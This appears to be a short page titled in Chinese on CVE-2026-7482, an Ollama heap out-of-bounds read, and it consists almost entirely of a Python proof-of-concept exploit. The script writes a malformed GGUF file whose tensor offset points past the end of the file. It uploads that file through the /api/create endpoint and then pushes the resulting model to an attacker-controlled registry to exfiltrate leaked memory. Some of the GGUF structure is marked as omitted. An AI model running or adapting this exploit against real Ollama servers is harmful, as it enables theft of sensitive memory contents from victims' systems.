CVE-2026-7482 Ollama堆越界读取漏洞

import requests import struct # Target configuration TARGET_URL = "http://localhost:11434" ATTACKER_REGISTRY = "http://attacker-controlled-registry.com" # 1. Craft a malicious GGUF file structure # This function simulates creating a GGUF file where tensor offsets # point beyond the end of the file, triggering the heap read. def create_malicious_gguf(filename): with open(filename, "wb") as f: # Write GGUF Magic Number ("GGUF" in hex) f.write(b'GGUF') # Write Version (3 for GGUF v3) f.write(struct.pack('<I', 3)) # Write Tensor Counts (1 for simplicity) f.write(struct.pack('<Q', 1)) # ... (Metadata omitted for brevity) ... # Write Tensor Info: Name offset, Type, Offset (EVIL), Size # The key is setting the 'offset' to a value larger than the file size # e.g., offset = 0xFFFFFFFF (very large) evil_offset = 0xFFFFFFFF tensor_size = 0x1000 # Tensor Name (null terminated) f.write(b'tensor_name\x00') # Tensor Data mapping (Offset, Type, etc.) # In a real exploit, this structure must match the GGUF spec precisely # to pass initial parsing but fail during actual data access. f.write(struct.pack('<Q', evil_offset)) # The malicious offset f.write(struct.pack('<I', 0)) # Type f.write(struct.pack('<Q', tensor_size)) # Size def exploit(): gguf_file = "malicious.gguf" create_malicious_gguf(gguf_file) try: # Step 1: Upload and create model (triggers quantization & leak) print(f"[*] Uploading malicious model to {TARGET_URL}/api/create...") with open(gguf_file, 'rb') as f: files = {'file': (gguf_file, f, 'application/octet-stream')} # Modelfile instruction to use the uploaded binary data = { 'name': 'leaked-model', 'modelfile': 'FROM ./malicious.gguf' } r = requests.post(f"{TARGET_URL}/api/create", files=files, data=data) if r.status_code == 200: print("[+] Model creation initiated. Heap out-of-bounds read likely occurred.") else: print(f"[-] Upload failed: {r.text}") return # Step 2: Exfiltrate the model containing leaked memory print(f"[*] Pushing model to attacker registry: {ATTACKER_REGISTRY}") push_payload = { "name": "leaked-model", "stream": False, "insecure": True # if using http registry } p = requests.post(f"{TARGET_URL}/api/push", json=push_payload) if p.status_code == 200: print("[+] Exploit successful. Sensitive memory data exfiltrated.") else: print(f"[-] Push failed: {p.text}") except Exception as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": exploit()